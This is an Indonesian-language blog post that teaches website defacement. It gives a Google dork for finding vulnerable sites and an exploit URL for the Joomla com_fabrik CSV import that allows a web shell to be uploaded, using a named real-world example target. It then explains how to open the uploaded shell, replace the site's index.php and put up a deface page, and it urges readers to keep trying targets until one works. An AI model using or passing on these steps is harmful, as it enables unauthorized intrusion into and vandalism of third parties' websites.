Bahan : Shell ( Copas langsung gan ! )
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com
Nb :
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri :p .
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.5nine.ru/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Masukkan shell milik sobat (Choose File) dan lalu klik tombol import CSV
4. Setelah proses Upload selesai, ganti link nya menjadi
www.sitekamu/media/namashellkamu.php
Contoh : http://www.5nine.ru/media/shell.php (Jika nama shell kamu adalah Shell)
*Jika berhasil, akan muncul tampilan shell milik anda. jika tidak berhasil, berarti cari target lain sampai ketemu.
5. Klik pada tulisan html atau lainnya sesuai dengan webnya (Tulisan kedua dari belakang).
*Setiap web tidak selalu sama
6. Cari tulisan yang bernama index.php lalu edit.
*Bukan index.html / lainnya
7. Hapus semua script web dan tempelkan script deface milikmu di index.php. lalu tekan tombol save.
8. Jika save succes maka akan muncul script anda di halaman utama web target.
Sekian semoga bermanfaat, dan ingat ! jangan pelit untuk berbagi :')
Sampai jumpa di lain waktu, terima kasih...
Jika anda belum punya script deface nya copy script yg ada di bawah ini
Tidak ada komentar:
Posting Komentar